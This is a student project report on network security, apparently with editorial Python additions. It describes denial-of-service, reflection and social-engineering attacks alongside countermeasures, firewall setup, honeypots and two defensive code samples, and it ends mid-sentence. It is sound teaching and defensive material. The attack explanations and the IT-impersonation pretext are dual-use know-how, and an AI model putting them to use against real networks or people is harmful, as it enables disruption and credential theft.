Figure 2.6: DoS
• DDoS
A distributed denial of service attack is when an attacker attacks from multiple source
systems. A DDoS attack is generally more effective at bringing down huge corporate sites
than a DoS attack. The attacker can arrange for a large number of computers to
connect to a website at the same time. The web server has a maximum allowed
number of client connections. If this number is reached, the server will deny further
connections, so there will be a denial of service. Usually the attacker does not own all
these computers, so he uses Trojan horses with back doors as malicious code to infect
computers, which become zombies (also called “secondary victims”). The users of the
infected computers are not aware that their computers are used in a DDoS attack. DoS
bots (bot is short for robot: a flooding program present on the secondary victim's
computer) usually support standard flooding methods such as ICMP, UDP, TCP, and SYN
flooding. The Internet services and resources under attack are the “primary victims”.
A typical DDoS attack consists of master, slaves, and victim: the master being the
attacker, the slaves being the compromised systems and the victim being the attacker’s target.
Figure 2.7: DDoS Attack
• DRDoS
DRDoS is when an attacker sets his bots to flood different intermediate hosts with
spoofed packets. For example, the attacker sets half his bots to flood yahoo.com with
spoofed ICMP packets and half ebay.com with spoofed ICMP packets. The spoofed
packets seem to have microsoft.com as their source, so yahoo.com and ebay.com flood
microsoft.com (ebay.com and yahoo.com reply to the spoofed source). For each
packet the attacker sends to yahoo.com or ebay.com, yahoo.com or ebay.com may
have thousands of machines behind the same IP address. Each of these machines will
reply to the spoofed ICMP packet, therefore amplifying the power of the attack
greatly.
Figure 2.8: DRDoS- Red Lines: Connection from the attacker's computer to the zombie computers. Blue Lines: Zombies sending spoofed ICMP packets. The ICMP packets look like they come from the Internet core router the attacker wants to attack. Green Lines: Each of the computers connected to ebay.com, yahoo.com, cnn.com and Amazon.com replies to the spoofed ICMP packets, therefore flooding the Internet core router.
Figure 2.9: DRDoS- Malicious SYN packets are being "Reflected" off innocent TCP servers. Their SYN/ACK responses are being used to flood and attack the target network.
There are also different types of DoS attacks:
• TCP SYN Flood Attack
A TCP session is established by using a three-way handshake mechanism, which
allows the client and the host to synchronize the connection and agree upon the initial
sequence numbers. When the client connects to the host, it sends a SYN request to
establish and synchronize the connection. The host replies with a SYN/ACK, again
to synchronize. Then the client acknowledges that it received the SYN/ACK packet by
sending an ACK. When the host receives the ACK the connection becomes
OPEN, allowing traffic from both sides (full-duplex). The connection remains open
until the client or the host issues a FIN or RST packet, or the connection times out. If
you flood a remote computer with SYN packets it is going to send back a SYN/ACK
packet for each one, so bandwidth will be wasted. In addition, in a TCP SYN flood attack the
connection is never completed, so the target computer is left waiting for an ACK;
therefore it is possible to max out the remote computer's connection queue.
Connections from legitimate users will be rejected in this case. The amount of
bandwidth this attack uses is very minimal, although if done on a very large scale it
could affect the bandwidth of a web server.
Figure 2.10: TCP 3 way handshake
Countermeasure: Many routers and other network nodes today are able to detect SYN
floods by monitoring the amount of unacknowledged TCP sessions and kill them
before the session queue is full. They can often be configured to set the maximum
allowed number of half-open connections, and limit the amount of time the host waits
for the final acknowledgement. Without these preventive measures, the server could
eventually run out of memory, causing it to crash entirely.
• UDP Flood Attack
UDP flooding is when the attacker sends garbage packets from UDP port(s) to UDP
port(s) on the remote computer. Since UDP is a connectionless protocol (no
handshake mechanism), UDP flooding can be very effective and easy to abuse for
flood attacks. A common type of UDP flood attack, often referred to as a Pepsi attack,
is an attack in which the attacker sends a large number of forged UDP packets to
random diagnostic ports on a target host. The CPU time, memory, and bandwidth
required to process these packets may cause the target to become unavailable to
legitimate users.
Countermeasure: To minimize the risk of a UDP flood attack, disable all unused
UDP services on hosts and block the unused UDP ports if you use a firewall to
protect your network.
• Ping of Death Attack
An oversized ICMP datagram (size larger than 65,535 bytes) can crash IP devices that
were made before 1996 (Windows 95, NT4).
Countermeasure: Modern operating systems and network devices safely disregard
these oversized packets. Older systems can usually be updated with a patch.
• Smurf Attack
An attack where a ping request is sent to a broadcast network address with the
sending address spoofed so many ping replies will come back to the victim and
overload the ability of the victim to process the replies. This attack is made possible
mostly because of badly configured network devices that respond to ICMP echoes
sent to broadcast addresses. The amount of traffic sent by the attacker is multiplied by
a factor equal to the number of hosts behind the router that reply to the ICMP echo
packets.
Figure 2.11: Smurf Attack
Besides the target system, the intermediate router is also a victim, and thus also the
hosts in the bounce site. A similar attack that uses UDP echo packets instead of ICMP
echo packets is called a Fraggle attack.
Countermeasure: It is difficult to prevent Smurf attacks entirely because they are
made possible by incorrectly configured networks belonging to a third party. The Smurf
Amplifier Registry (SAR) at http://www.powertech.no/smurf/ and Netscan.org are among
several publicly available databases that can be used to configure routers and
firewalls to block ICMP traffic from these networks. The Smurf Amplifier Registry
(SAR) can be downloaded in Cisco ACL format. If you use Cisco routers, make sure
all interfaces are configured with the no ip directed-broadcast command (the default
since IOS 12.0).
• Teardrop Attack
A normal packet is sent then a second packet is sent which has a fragmentation offset
claiming to be inside the first fragment. This second fragment is too small to even
extend outside the first fragment. This may cause an unexpected error condition to
occur on the victim host which can cause a buffer overflow and possible system crash
on many operating systems. [15]
Countermeasure: Today’s implementations of the TCP/IP stack safely disregard such invalid packets.
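Returning to the TCP SYN flood countermeasure above (cap the number of half-open connections and limit how long the host waits for the final ACK), here is an added example, not code from the report, of a host-side monitor that tracks the handshake state of each client, refuses new SYNs once a port's half-open queue is full, and aborts handshakes that exceed the timeout. Packets are constructed tuples (src, sport, dst, dport, flags, time) rather than real captures.

```python
SYN, ACK, FIN, RST = "SYN", "ACK", "FIN", "RST"


class HalfOpenMonitor:
    def __init__(self, max_half_open: int = 100, handshake_timeout: float = 3.0):
        self.max_half_open = max_half_open          # queue size per (dst, dport)
        self.handshake_timeout = handshake_timeout  # seconds to wait for the ACK
        self.half_open = {}     # (src, sport, dst, dport) -> time the SYN arrived
        self.established = set()
        self.refused = []       # SYNs dropped because the queue was full
        self.expired = 0        # half-open entries aborted on timeout

    def _expire(self, now: float) -> None:
        """Drop handshakes older than the timeout (a real stack would send RST)."""
        stale = [k for k, t0 in self.half_open.items()
                 if now - t0 > self.handshake_timeout]
        for k in stale:
            del self.half_open[k]
        self.expired += len(stale)

    def half_open_count(self, dst: str, dport: int) -> int:
        return sum(1 for k in self.half_open if k[2:] == (dst, dport))

    def observe(self, pkt) -> str:
        """Feed one packet arriving at the monitored host; returns the decision."""
        src, sport, dst, dport, flags, now = pkt
        key = (src, sport, dst, dport)
        self._expire(now)
        if flags == SYN:
            if key in self.half_open or key in self.established:
                return "duplicate"
            if self.half_open_count(dst, dport) >= self.max_half_open:
                self.refused.append((key, now))
                return "refused"          # queue full: the symptom of a flood
            self.half_open[key] = now
            return "half-open"
        if flags == ACK and key in self.half_open:
            del self.half_open[key]       # handshake completed
            self.established.add(key)
            return "open"
        if flags in (FIN, RST):
            self.half_open.pop(key, None)
            self.established.discard(key)
            return "closed"
        return "ignored"

    def pending_sources(self) -> set:
        """Sources with refused or still-pending SYNs: the raw material for an
        alert. Under a flood with spoofed sources these are the forged addresses."""
        return {k[0] for k, _ in self.refused} | {k[0] for k in self.half_open}


def demo():
    """Constructed trace: one completed handshake, a burst of eight SYNs that
    never get their ACK, then a legitimate SYN after the timeout has passed."""
    m = HalfOpenMonitor(max_half_open=5, handshake_timeout=3.0)
    m.observe(("198.51.100.7", 50000, "192.0.2.80", 80, SYN, 0.0))
    m.observe(("198.51.100.7", 50000, "192.0.2.80", 80, ACK, 0.1))
    burst = [m.observe((f"203.0.113.{i}", 4000 + i, "192.0.2.80", 80, SYN, 0.2 + i / 100))
             for i in range(8)]
    late = m.observe(("198.51.100.8", 50001, "192.0.2.80", 80, SYN, 5.0))
    return burst, len(m.refused), m.expired, late, m.half_open_count("192.0.2.80", 80)
```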
2.7.4 Social Engineering
Before an attacker attempts to gain access to a secured system, he must first know certain
things about the target system. Although an attacker often uses technology, he may
simply try to ask for the information. If the right person asks, he or she will often get it all
too easily.
Social Engineering is the art of having people do what you want, or give you info on
passwords and almost anything, without them knowing they are doing so. Social
Engineering applies to every aspect of the internet and also to the real world.
This can start with a simple chat in a chat room or a phone call to a business that
someone wants to gain access to from the internet without having to hack in. In a
business situation of social engineering, the hacker starts by doing research on the company
so he will most likely know every department that the company has. He could then try to
phone up a department and say he is a member of the IT department and that the
passwords are being changed for routine security reasons; then he would tell the user to
change his/her password to whatever he wants. He could then simply log on to their
system using the new password and he’s in.
A social engineering attack usually involves an attacker impersonating a seemingly
harmless person to deceive company personnel to obtain information. Obtaining that
information may be the actual goal itself, or it may be used to aid the attacker in
penetrating a secured system. The information can be a user ID, password, access code
and other type of sensitive information, but can also be information that seems harmless
to share. A company phoned by a student conducting a survey about which operating
systems and software they use may actually be giving valuable information to a malicious
attacker. Malevolent competitors and ex-employees who want to settle a score, sabotage a
business, or steal a company secret often use social engineering techniques to reach their
malicious goals.
Social engineering attacks are often more complicated and require careful preparation,
acting and persuasion skills. A social engineer collects bits and pieces of information that
will lead him to his goal, typically using his most valuable tool, a phone. Calling a
company and bluntly asking for the information may alarm the employee on the other side of
the phone and ruin the entire attack before it really got started. So before the attacker can
persuade a victim to simply hand out information, he needs to crawl into the skin of
someone the victim will gladly give the information to, someone who works in the same
company for example. To do that he needs to know the company’s lingo, department
structure, internal phone numbers, and anything else that will make him an “insider”.
Once the attacker talks the talk, knows who to impersonate and who to ask what, it is just
a matter of asking the right questions without raising any suspicion to get everything he
wants.
Social engineers have found a relatively new way to attempt to obtain sensitive
information from naïve people, without having to pay them a visit or call them by phone:
email. The attacker sends malicious e-mail messages that seem to be legitimate and even have
a valid sender address. The message may contain a link that takes the victim to a website
that looks exactly like a site where he or she frequently buys online products with a credit
card number. Or the message may seem to have been sent by the IT department, and
includes an attachment that is supposedly the latest anti-virus update that must be
installed immediately. In reality, the attachment could be a Trojan horse creating a
backdoor for the attacker or logging keystrokes that are sent to the attacker by e-mail.
The most important thing in social engineering is building trust. If a hacker builds up
some trust with a user then he is going to find it easier to manipulate him to do what he
wants.
Countermeasure: Many companies have acknowledged the necessity of technology such as
firewalls, intrusion detection systems, and advanced authentication systems to secure
their information. However, this technology does not make them less vulnerable to a
social engineer. It may actually lead to a false sense of security, which may make them an
even easier target. To prevent successful social engineering attacks security policies must
be implemented and enforced. All employees must be informed and trained to recognize
and appropriately respond to a potential social engineering attack.
One of the most important policies that should be implemented is verification of requests.
Not only the identity of the requestor should be verified, but also the request he or she is
making. A simple method to verify the caller’s ID is to call the person back at the phone
number listed in the company’s phone directory. If someone outside the company asks for
inside information, he or she should be forwarded to a manager or the Information
Security department. When a copier maintenance person enters a building, the
receptionist should verify the appointment and ask for an ID.
The best defense against social engineering attacks by e-mail is using certificates for
encrypting and signing e-mail messages, allowing a recipient to positively identify the
sender.
By following some basic rules and using common sense, most social engineering attacks
can be prevented. It is essential to educate employees about these types of attacks and the
methods of a social engineer, because in any security system people are really the
weakest link.
3. Our Network Design
We now tackle the design part of our FYP, i.e. building our Network.
Mr. Ziad Shaaban, from the computer labs, provided our team with 4 Pentium3
computers (that we will place in Mr. Khaled Joujou’s lab). Therefore, we agreed with Mr.
Majari that our network will include: one Windows and one UNIX workstation, in
addition to one Windows and one UNIX server.
3.1 Topology
The network topology refers to its shape, or its layout. The topology defines how nodes
are connected to each other and how they communicate [8]. The figure
below illustrates the most common network topologies.
Figure 3.1: Network Topologies [8]
As was described in section 1 of this report, the most common topologies businesses use
are hierarchical star networks. Therefore, we have decided to use this kind of topology
when building our network, since the ultimate goal is to simulate a business firm.
3.2 Securing the Perimeter
The most common way of implementing perimeter security is using firewalls [9]. A
large array of firewalls exists today; each brand (and even each model within a brand) focuses
on better security for a given networked environment. From a hacker’s perspective, there
are numerous targets: routers, switches, hosts, applications, but also the network as a
whole (DoS attacks).
Firewalls are hardware devices (though some software firewalls exist) that filter
information coming into and out of a secured network. Firewalls generally use the
following methods to do their job [10]:
• Packet filtering - Packets (small chunks of data) are analyzed against a set of
filters. Packets that make it through the filters are sent to the requesting system
and all others are discarded.
• Proxy service - Information from the Internet is retrieved by the firewall and then
sent to the requesting system and vice versa.
• Stateful inspection - A newer method that doesn't examine the contents of each
packet but instead compares certain key parts of the packet to a database of
trusted information. Information traveling from inside the firewall to the outside is
monitored for specific defining characteristics, and then incoming information is
compared to these characteristics. If the comparison yields a reasonable match,
the information is allowed through. Otherwise it is discarded.
Some common Firewall Filters (for inside-to-outside protection) are [11]:
• IP addresses - For example, if a certain IP address outside the company is reading
too many files from a server, the firewall can block all traffic to or from that IP
address.
• Domain names - A company might block all access to certain domain names, or
allow access only to specific domain names.
• Protocols - A company might set up only one or two machines to handle a
specific protocol and ban that protocol on all other machines. Protocols include:
IP, TCP, HTTP, FTP, UDP, ICMP, SMTP, SNMP, Telnet…
• Ports - Any server machine makes its services available to the Internet using
numbered ports, one for each service that is available on the server. For example,
if a server machine is running a Web (HTTP) server and an FTP server, the Web
server would typically be available on port 80, and the FTP server would be
available on port 21. A company might block port 21 access on all machines but
one inside the company.
• Specific words and phrases - This can be anything. The firewall will sniff (search
through) each packet of information for an exact match of the text listed in the
filter and block any packet with the word or phrase.
Firewalls can protect or help protect us (with additional hardware and software) from
(outside-to-inside security):
• Remote login - When someone is able to connect to your computer and control it
in some form. This can range from being able to view or access your files to
actually running programs on your computer.
• Application backdoors - Some programs have special features that allow for
remote access. Others contain bugs that provide a backdoor or hidden access,
which provides some level of control of the program.
• SMTP session hijacking - SMTP is the most common method of sending e-mail
over the Internet. By gaining access to a list of e-mail addresses, a person can
send unsolicited junk e-mail (spam) to thousands of users. This is done quite
often by redirecting the e-mail through the SMTP server of an unsuspecting host,
making the actual sender of the spam difficult to trace.
• Operating system bugs - Like applications, some operating systems have
backdoors. Others provide remote access with insufficient security controls or
have bugs that an experienced hacker can take advantage of.
• Denial of service - This type of attack is nearly impossible to counter. What
happens is that the hacker sends a request to the server to connect to it. When the
server responds with an acknowledgement and tries to establish a session, it
cannot find the system that made the request. By inundating a server with these
unanswerable session requests, a hacker causes the server to slow to a crawl or
eventually crash.
• E-mail bombs - An e-mail bomb is usually a personal attack. Someone sends you
the same e-mail hundreds or thousands of times until your e-mail system cannot
accept any more messages.
• Macros - To simplify complicated procedures, many applications allow you to
create a script of commands that the application can run. This script is known as a
macro. Hackers have taken advantage of this to create their own macros that,
depending on the application, can destroy your data or crash your computer.
• Viruses - Probably the most well-known threat is computer viruses. A virus is a
small program that can copy itself to other computers. This way it can spread
quickly from one system to the next. Viruses range from harmless messages to
erasing all of your data.
• Spam - Typically harmless but always annoying, spam is the electronic equivalent
of junk mail. Spam can be dangerous though. Quite often it contains links to Web
sites. Be careful of clicking on these because you may accidentally accept a
cookie that provides a backdoor to your computer.
• Redirect bombs - Hackers can use ICMP to change (redirect) the path information
takes by sending it to a different router. This is one of the ways that a denial of
service attack is set up.
• Source routing - In most cases, the path a packet travels over the Internet (or any
other network) is determined by the routers along that path. But the source
providing the packet can arbitrarily specify the route that the packet should travel.
Hackers sometimes take advantage of this to make information appear to come
from a trusted source or even from inside the network! Most firewall products
disable source routing by default.
It is evident that some of the above attacks are very hard to prevent just using a firewall,
and other software/hardware devices are needed [9].
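To make the three firewall methods above concrete, here is an added example, not the report's own or the Linksys product's code, of a toy firewall that applies packet-filter rules (addresses, protocols, ports), keeps a state table so that only replies to connections opened from the inside are let back in, refuses source-routed packets (as noted above, most products do by default), and drops directed broadcasts of the kind Smurf amplifiers depend on (section 2.7.3). The LAN range, rules and packets are constructed; the ident rule (port 113) mirrors the setting discussed later in section 4.1.1.

```python
from dataclasses import dataclass
from typing import Optional
import ipaddress


@dataclass(frozen=True)
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    proto: str             # "tcp", "udp" or "icmp"
    direction: str         # "in" = arriving from the Internet, "out" = leaving the LAN
    source_routed: bool = False   # IP source-route option present


@dataclass
class Rule:
    action: str                      # "allow" or "deny"
    direction: Optional[str] = None  # None matches either direction
    proto: Optional[str] = None
    src: Optional[str] = None        # CIDR, e.g. "203.0.113.0/24"
    dst: Optional[str] = None
    dport: Optional[int] = None

    def matches(self, p: Packet) -> bool:
        def in_net(ip, cidr):
            return cidr is None or ipaddress.ip_address(ip) in ipaddress.ip_network(cidr, strict=False)
        return (self.direction in (None, p.direction)
                and self.proto in (None, p.proto)
                and self.dport in (None, p.dport)
                and in_net(p.src, self.src) and in_net(p.dst, self.dst))


class StatefulFirewall:
    def __init__(self, rules, lan_cidr: str = "192.168.100.0/24"):
        self.rules = rules
        self.lan = ipaddress.ip_network(lan_cidr)
        self.flows = set()   # outbound 5-tuples whose replies are allowed back in
        self.log = []        # (packet, action, reason): the "log feature" of 4.1.1

    def _decide(self, p: Packet, action: str, reason: str):
        self.log.append((p, action, reason))
        return action, reason

    def filter(self, p: Packet):
        src, dst = ipaddress.ip_address(p.src), ipaddress.ip_address(p.dst)
        # Sanity checks that hold regardless of the rule list.
        if p.source_routed:
            return self._decide(p, "deny", "source routing disabled")
        if p.direction == "in" and src in self.lan:
            return self._decide(p, "deny", "outside packet claims an inside source")
        if dst == self.lan.broadcast_address:
            return self._decide(p, "deny", "directed broadcast (smurf amplifier)")
        # Stateful inspection: a reply to a connection the LAN opened is let in.
        if p.direction == "in" and (p.src, p.sport, p.dst, p.dport, p.proto) in self.flows:
            return self._decide(p, "allow", "reply to established flow")
        # Packet filtering: first matching rule wins, default deny.
        for rule in self.rules:
            if rule.matches(p):
                if rule.action == "allow" and p.direction == "out":
                    self.flows.add((p.dst, p.dport, p.src, p.sport, p.proto))
                return self._decide(p, rule.action, "rule")
        return self._decide(p, "deny", "default deny")


def demo():
    """Constructed traffic against constructed rules: block ident (113) from
    outside, allow everything out, allow web traffic to the inside server."""
    fw = StatefulFirewall([
        Rule("deny", direction="in", proto="tcp", dport=113),
        Rule("allow", direction="out"),
        Rule("allow", direction="in", proto="tcp", dst="192.168.100.101/32", dport=80),
    ])
    packets = [
        Packet("192.168.100.100", 40000, "198.51.100.5", 80, "tcp", "out"),
        Packet("198.51.100.5", 80, "192.168.100.100", 40000, "tcp", "in"),    # reply
        Packet("203.0.113.4", 5555, "192.168.100.100", 40000, "tcp", "in"),   # unsolicited
        Packet("203.0.113.4", 0, "192.168.100.255", 0, "icmp", "in"),         # smurf probe
        Packet("192.168.100.5", 1234, "192.168.100.101", 80, "tcp", "in"),    # spoofed source
        Packet("203.0.113.4", 1234, "192.168.100.101", 80, "tcp", "in", source_routed=True),
        Packet("203.0.113.4", 1234, "192.168.100.101", 113, "tcp", "in"),     # ident
        Packet("203.0.113.4", 1234, "192.168.100.101", 80, "tcp", "in"),      # web server
    ]
    return [fw.filter(p)[0] for p in packets]
```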
3.3 Our Network
With the 4 computers available, we researched computer stores in the greater Beirut
area for firewalls and switches. We found a very interesting product that suits our needs:
the Linksys BEFSX41 EtherFast Cable/DSL Firewall Router w/ 4-Port Switch/VPN
endpoint.
Basically, this product has a 4 port built in switch, VPN Endpoint, VPN Pass-Thru,
Firewall and DHCP Server functionalities [14].
Its security functionalities are as follows [14]:
• IPSec Pass-Thru
• PPTP Pass-Thru
• SPI (Stateful Packet Inspection)
• DoS (Denial of Service) Attack Detection
• URL Content Filtering
• DMZ
• Cookies Blocking
• Java Blocking
• ActiveX Blocking
• NAT
This product was found at www.pcandparts.com, a Lebanese online computer store, for
only $89.00.
The following is an illustration of our network:
4. Installing the Network
At the beginning of the spring semester, the FEA IT Unit provided us with four
computers equipped with Pentium 2 processors, having 1.5GB hard disks and 64MB of
memory. Clearly, these computers’ specifications were not up to today’s standard. We
therefore decided to work on Windows 2000 (1 server, 1 workstation) and Fedora Core 3
(also 1 server and 1 workstation).
However, for Windows to work properly, we had to increase the memory of the 2
computers we were going to install Windows on from 64MB to 256MB (keeping in
mind that these were scarce SDRAMs). Moreover, to avoid problems with hard disk
space and stay on the safe side, we replaced all the 1.5GB drives with 3GB drives. In
addition to this, the computer on which we wanted to install the Fedora server had a
faulty CD drive, which prompted us to replace it with a new one.
Also, when installing the Fedora Core 3 OS, we were having problems with incomplete
and very slow installation processes due to the low memory space (64MB). Since it was
unnecessary to buy additional memory (Fedora 3 works fine on 64MB), we had to
manually unplug memory from the computers equipped with windows and use them in
the Fedora PCs just for the installation time.
All in all, installing the OS on the four different computers was a lengthy process due to
the low specifications and faulty hardware on the PCs we were provided with.
4.1 Plugging the Network and Creating a Domain
Now that our 4 PCs were up and running, it was time to plug them to the Linksys device
(firewall/router with 4 port switch), configure the device and create a domain with
different users.
4.1.1 Setting Up the Linksys Product
First, we started by defining the IP addresses. The external IP address (i.e. Router IP
address) was chosen to be 192.168.1.1 (with subnet mask of 255.255.255.0). The internal
network IP addresses were 192.168.100.100 for the Windows workstation,
192.168.100.101 for the Windows server, 192.168.100.102 for the Fedora workstation
and 192.168.100.103 for the Fedora server. Note that NAT (Network Address Translation), which allows multiple
computers to share one internet connection, was enabled. At first, we thought that giving
IP addresses on the external and internal side that looked roughly the same would be
dangerous. But with the honey-potting options (see section 4.5) this is not a big threat.
As for the firewall security settings, we started by setting them to maximum security. We
enabled Stateful Packet Inspection (SPI), as well as filtering of Proxy, Cookies,
Java Applets and ActiveX. Also, we blocked anonymous internet requests to enable the
router to drop unaccepted TCP requests and ICMP packets from the internet (in our case,
from the hackers). Note that this feature can be disabled in the case the Hackers’ team is
unsuccessful in their outside attacks. Another important aspect of firewall security is
closing port 113. This port is a service port that most applications do not need. Closing it
would prevent intruders from attacking the router through the internet. Again, if the
hackers’ team is unsuccessful in attacking us with this feature on, we can open port 113
to help them.
The firewall also has a feature that can restrict internet access (i.e. the device will only
work as a simple switch) all the time or during certain periods of time. However, we
turned that option off, as a company would ideally have internet access 24 hours a day.
Finally, an important feature that we recommend to use in the firewall is the “Log
Feature”. The Log screen provides information on all the log activities. Downloading
log viewer software can also enhance this option by generating files to keep a permanent
record of the log activities. The option permits the user to:
• Get logs of all incoming and outgoing activities (useful when running website or
FTP server).
• Get system logs, i.e. activities such as warm boot and access to the router based
utility.
• Get access logs, i.e. keep track of all incoming and outgoing activities via the
internet (in our case, the hackers’ team will connect in the internet port).
By monitoring those log files regularly, our team can know when the hackers tried to
attack our system from the outside by sending packets for example.
4.1.2 Creating the Domain
We created a Kerberos domain on the windows 2000 server that we called FYP. Also, as
a requirement put forth by Deloitte, we created about 20 user accounts that we distributed
in different user groups having different prerogatives and power. These users were given
consistent usernames (e.g. jmoukarzel for Jean Moukarzel) and dictionary-word
passwords, at Deloitte's request, to simulate real life situations where most
employees set easy passwords for their accounts.
4.2 Tightening Security
After setting up the domain and firewall/router settings, the next step is to tighten our
network’s security.
4.2.1 Patches on Windows
Installing service packs and patches is really important on Windows 2000. One should
always check the Microsoft website for any updates and download the newest patches
and service packs to make sure the network is secure. This is precisely what we did, by
downloading the patches talked about in section 2.4. Also, in section 4.4, we will see
what tool can be used to update security.
4.2.2 Disabling USB ports to Protect Against Flash Drives
Flash drives are small solid state memory sticks that are about the size of a highlighter
pen and can hold anywhere from 1Mb to 1GB of data. They're incredibly lightweight,
very portable (some models function as key chains) and they are compatible with any PC
equipped with a USB port and running Windows 2000/XP, Mac OS 9-10X or Linux
2.4.17 (Windows 9x PCs require a one-time driver installation). USB Flash Drives have
fast transfer rates (1Mb/sec), no moving parts, and they don't require a separate power
source or batteries. Using flash drives is very simple: they just have to be plugged into
the USB port of the PC and Windows plug and play will immediately see them as an
additional drive. Flash drives hold more data than a floppy, are more portable than ZIP
drives and other remote storage devices, and more convenient (and less fragile) than CD-
RW disks. In short, USB Flash Drives may just be the perfect and most affordable
removable storage medium.
Needless to say, USB Flash Drives are very useful, but they also introduce big threats to a
company’s network, such as [18]:
• Viruses: Users can bring in infected documents from home, or take home a
business document to an infected PC, update it, and return it to a corporate file
server. Unless the company’s antivirus policies are very aggressive and all
files stored on the network are actively scanned, flash drives can present a new
vector for computer viruses that is nearly impossible to defend against. Most
antivirus software operates "reactively" to threats and can only identify viruses
that have been previously identified. Therefore, a virus writer could theoretically
infect a corporate network by plugging a USB flash drive into any computer and
opening the virus file.
• Malicious Software: In addition to viruses, users could bring in unauthorized
software or data files from home such as shareware programs, software pranks,
MP3 files, video clips and other files that may violate corporate policies.
Moreover, a user with bad intentions can bring in spyware or keystroke loggers
that could enable him to capture passwords and other sensitive information.
• Data Theft: This includes corporate espionage, i.e. stealing secret and vital data
from the company’s server (like client lists, sales forecasts, research data…) in a
matter of a few minutes and selling it to competitors, hackers…
73
Many measures can be taken to prevent any misuse of USB flash drives, ranging from
soft measures to hard security measures such as:
• Educating the users: it is important for the users of the network to know the
risks that such devices can present. Moreover, a company should establish a
policy for taking data out of the office, or bringing files from home.
• Enforcing the lock-desktop policy: an essential measure if a user account has access
to sensitive data, to prevent any theft of data while the user is away.
• Frequently updating antivirus policies and actively scanning the network on a
regular basis.
• Restricting USB ports on desktops: USB devices cannot be managed using Group
Policy in Windows 2000 or XP. However, USB ports can be disabled on all
desktops or on desktops that have access to sensitive data. In doing so, the
administrator will need to make sure any peripherals in use (such as keyboards,
mice, scanners) use legacy ports instead of USB ports. Note that in most corporate
networks, printers are assigned to specialized network print servers and may not
be an issue. Also, third-party tools such as SecureWave’s SecureNT software (which
we highly recommend) allow businesses to control end-user access to I/O
devices (including USB ports).
To disable the use of USB storage devices on a computer running Windows, the
following can be done [19]:
1. Open Windows Explorer or My Computer.
2. Navigate to the %SystemRoot%\Inf folder.
3. Right-click the Usbstor.pnf file and choose Properties.
4. Select the Security tab.
5. In the Group or user names list, select the user or group that you wish to
deny access to and check/uncheck the Deny box for each option: read,
write, read and write…
6. Press OK.
Alternatively, some companies block access to the E: or X: drive, i.e. the drive letter that
is assigned when a USB flash drive is plugged in. This method is not recommended,
however, as it can be bypassed easily.
4.3 Creating Common and User Files
To simulate a real company, we have created different sorts of folders and files:
• A networked shared folder that can be accessed by any user, with company files
(such as Word documents with names, phone numbers…)
• A folder for each user that can only be accessed by the concerned user, with Excel
sheets, Word documents, pictures, etc… to simulate a real-life business situation.
One of the main aims of the hackers’ team will be to steal the data in those files, change it,
create new fake files, etc… Of course, these files were backed up daily, so in case the
hackers delete/edit them, vital company information will not be lost.
4.4 Scanning the Network and Updating Security
Many freeware tools, or software tools that are available as trial versions, can be found
on the Internet. They are very useful to administrators as they perform network scans and
detect vulnerabilities in the network. We have used them whenever possible (i.e.
whenever available for free or as a trial version) to enhance our network security.
4.4.1 Linux Tools
• PortSentry: this tool monitors network probes and attacks against the server. It
can also be configured to log and counter these probes and attacks. See the appendix
for detailed steps.
• CHKROOTKIT: this tool can be downloaded at www.chkrootkit.org. It scans
the system for known exploits, Trojan commands, and worms used to
compromise a system. Usually, CHKROOTKIT does not perform very well when
PortSentry is also being used.
• Nessus: Nessus searches for and localizes vulnerabilities on the system by actively
trying to perform known exploits against the system. When vulnerabilities are
found, it makes recommendations about upgrades and configuration changes. The
software is available at http://nessus.org.
4.4.2 Windows Tools
The main tool we used to scan our Windows server and network domain was GFI
LANguard (available as a free 15-day trial version). This program basically scans the
network for missing patches, service packs, open ports and other vulnerabilities and
recommends solutions to those vulnerabilities. By running LANguard, we were able, for
example, to notice that some vital patches for network security were missing.
Also, we have found a useful tool called EventAlarm (available as a free 30-day trial
version) that gives messages, or alarms, to the administrator whenever something
specified has taken place. For example, the administrator can set EventAlarm to give a
message every time a user logs in, or every time a computer in the network crashes or has
problems. In this way, monitoring the network becomes easier.
4.5 Confusing the Hackers: Honey Pots
4.5.1 What is a Honeypot
Honeypots are a new technology for the network security industry whose value, unlike
that of most security tools designed to defend and protect a computer network, lies in being
probed, attacked, or compromised. Honeypots expect no data, so any traffic to or from them
is most likely unauthorized activity. There are two general types of honeypots:
production and research. Production honeypots are easy to use, capture only limited
information, and are used primarily by companies or corporations. Production honeypots are
used to protect a network; they directly help secure an organization’s network. Research
honeypots are different; they are used to collect information. Research honeypots are
complex to deploy and maintain, capture extensive information, and are used primarily by
research, military, or government organizations. Neither solution is better than the other;
it all depends on what we want to achieve. From now on, we will concentrate on
production honeypots since they are the ones relevant to our FYP, being used for
protection purposes. We will use the word honeypot in the sense of production honeypot
from now on. Honeypots are not limited to solving only one problem; they have a number
of different applications. For prevention, honeypots can be used to slow down or stop
automated attacks. For example, the honeypot LaBrea Tarpit is used to slow down
automated TCP attacks, such as worms. But in general, honeypots are not effective
prevention mechanisms. Against human attackers, honeypots can utilize psychological
weapons such as deception or discouragement to confuse or stop attacks. Honeypots can
also be used to detect unauthorized activity; they excel at this capability due to their
advantages. Traditional detection solutions can flood organizations with alerts, yet only a
few of the alerts signal valid attacks. Also, many of today's technologies are not designed
to detect unknown attacks. Honeypots help resolve both of these problems. Honeypots
generate very few alerts, but when they do, it is almost certain that something malicious has
happened. Honeypots can also detect and capture unknown attacks as well as known
attacks. Finally, honeypots can be used to respond to an attack. If an attacker breaks into
an organization, and one of the systems he broke into was a honeypot, then information
gathered from that system can be used to respond to the break-in. Honeypots can also be
used to identify an attacker once he is in an organization’s network. They can operate on
any variety of computer systems and just about any type of computer. While most public
domain software for setting up a honeypot is written for UNIX, many of these systems
have already been ported to Windows. [20]
4.5.2 Classifications of Honeypots
Levels of Interaction
We have already talked about classification based on functionality (production and
research honeypots) in the honeypot definition above. In this section, we will classify
honeypots by level of interaction. When dealing with honeypots there is a direct
correlation between the amount of data that can be collected and the amount of damage
that can be done by an attacker. The more information the honeypot is able to collect, the
greater the risk, the complexity and the level of interaction. By risk we mean the chance
that an attacker can use the honeypot to harm, attack, or infiltrate other systems or
organizations.
Low Interaction Honeypots
A low interaction honeypot is one that is easy to install, configure, deploy, and maintain.
Because the attacker can do less than he might with higher interaction honeypots, it
is less risky to implement. Low interaction honeypots do not allow the attacker access to
an operating system from which he might attack other systems, which also significantly
reduces risk. Low interaction honeypots are normally production honeypots, as they are
used to protect an organization. Since low interaction honeypots restrict an attacker's
activity, they are limited in the amount of information they can give about an attacker.
The information received from this type of honeypot is usually restricted to the time
and date of the attack, the source IP address and source port of the attack and the destination
IP address and destination port of the attack. An example of a low interaction honeypot is
